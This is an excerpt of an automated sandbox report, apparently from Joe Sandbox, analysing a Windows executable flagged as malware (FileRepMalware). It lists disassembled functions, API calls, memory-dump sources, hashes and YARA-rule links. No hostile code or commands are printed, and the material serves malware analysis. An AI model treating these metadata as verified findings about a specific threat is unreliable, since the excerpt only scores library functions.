                                                                                                                                                                                                                                    • Opcode ID: 030a65f3e35046576361d430bfd6d990099fe8f2133a894fb164c9d84277bcde
                                                                                                                                                                                                                                    • Instruction ID: ad42629e6090a7c5cb7f49d02ed3a27406322bc61719277fce639532f6e2c00f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 030a65f3e35046576361d430bfd6d990099fe8f2133a894fb164c9d84277bcde
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1421772170CA4682EA20EBD5E4301BEA3A8FF95794F544231EA4C57755EF7DD544CB00
                                                                                                                                                                                                                                    Function 00007FF7B2B7C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2718003287-0
                                                                                                                                                                                                                                    • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                    • Instruction ID: f47c6dfe5457a1977ca536a7ec57ec50a504dd4a4b8f41f7e1890882c08b3106
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D11672B09A4089E752EF6DC4402AD77B1FB66798B804239DF5E97B99EE78D006C310
                                                                                                                                                                                                                                    Function 00007FF7B2B7CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B7CF4B), ref: 00007FF7B2B7D07C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B7CF4B), ref: 00007FF7B2B7D107
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 953036326-0
                                                                                                                                                                                                                                    • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                    • Instruction ID: ddf51081c67b943464c89e5e1c38c6015651a196fc8e1ce876ce878806332cab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9691EB32F0A65245F752BF6D944027EA7A0BB667C4F944139DF0E57AA8EF78D482C320
                                                                                                                                                                                                                                    Function 00007FFD93D12DEC Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                    • String ID: Operation not permitted$unknown
                                                                                                                                                                                                                                    • API String ID: 1452528299-31098287
                                                                                                                                                                                                                                    • Opcode ID: 6e039b2ae405bf32e902cb63e90cdd89e9ea5b2a185e5041757cc7b9f8671bd5
                                                                                                                                                                                                                                    • Instruction ID: 0e6958d97011803fe4c7c6b827165444cf72f7412c1e2d99ab1a912f7908ce8f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e039b2ae405bf32e902cb63e90cdd89e9ea5b2a185e5041757cc7b9f8671bd5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1816D61B1864286FB309BE1E8B437927A8FF85788F445135E90E5739ADF3DE440E301
                                                                                                                                                                                                                                    Function 00007FF7B2B7F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4170891091-0
                                                                                                                                                                                                                                    • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                    • Instruction ID: ad79662c188449106420c7160dcfa43e40c403a8dd79396cade1bcf8527360e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44513732F0611186EB15FF6C88556BEA761AF26358F90023ADF1D52BF9EF78A402C310
                                                                                                                                                                                                                                    Function 00007FF7B2B7577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2780335769-0
                                                                                                                                                                                                                                    • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                    • Instruction ID: 853517c2819e6cc1d8386f0a17bc09d206f202acd5d4a4e8436edd818eccc128
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C51B122E192418AF711EF78D4407BEB7A1AB69B58F504435DF1D4B6ACEF78E440C320
                                                                                                                                                                                                                                    Function 00007FF7B2B620C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1956198572-0
                                                                                                                                                                                                                                    • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                    • Instruction ID: 9c845aa00cd284ee15acc40bedeae4b2c7b9aeae3dbdd19f56e33b9c4a9f853a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE110621A0D14282F647A76DE54927BE252EBAA780FC84030DB4D87B9EEDBDD4C0C214
                                                                                                                                                                                                                                    Function 00007FF7B2B6D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                    • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                    • Instruction ID: 308713a4da5d1685d92c0d5a605287c72b7bd8d538c7cec2ed417b4e8e4fdc96
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E118F22B15B05C9EB009F74E8452BA73A0F72A718F440E35DB5D86768EF78D055C350
                                                                                                                                                                                                                                    Function 00007FF7B2B85B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                    • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                    • Instruction ID: f933a8e535a0e8425cdd95c7e598108658c05b899318956af60706f70ccc1b6a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14415D12A1A24241F7626B1DD40577BE690EBA27A4F944238EF4C0AADDFFBCD441CB10
                                                                                                                                                                                                                                    Function 00007FFD93D11613 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: getaddrinfo
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\bio\b_addr.c
                                                                                                                                                                                                                                    • API String ID: 300660673-2547254400
                                                                                                                                                                                                                                    • Opcode ID: cee4118a91f4e298bb24630199019e17d2161ccb3740edd78188986782efcc03
                                                                                                                                                                                                                                    • Instruction ID: d63fec0f57aa1d4caab57cbbf32a4158e3c855347330fd396d1b109801d37c7e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cee4118a91f4e298bb24630199019e17d2161ccb3740edd78188986782efcc03
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D41C172B1868287E724CFD6A4606BA7768FB84744F405235FA8953B85DF3CE8458B40
                                                                                                                                                                                                                                    Function 00007FF7B2B79014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B79046
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7B2B6CBA5), ref: 00007FF7B2B79064
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe, xrefs: 00007FF7B2B79052
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                    • API String ID: 3580290477-3624693095
                                                                                                                                                                                                                                    • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                    • Instruction ID: 75333a7cd189500cb1f0fb36940525c2acb25f483965cea86c4d71d1ea5e9a57
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F541A132A0AA0285E757FF2D94400BEB3A4EB567D0B954035EB4D47BA9EE7CE491C320
                                                                                                                                                                                                                                    Function 00007FF7B2B7CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                    • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                    • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                    • Instruction ID: 53016007c94c5f92feb0fdf920e9baac73490a641f8e52ca4767f7eae9c23db6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA41B432719A4181EB61AF29E4443BAA760FBA9784F944135EF4D877A8FF7CD401C750
                                                                                                                                                                                                                                    Function 00007FFD93F546F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmpDownload File
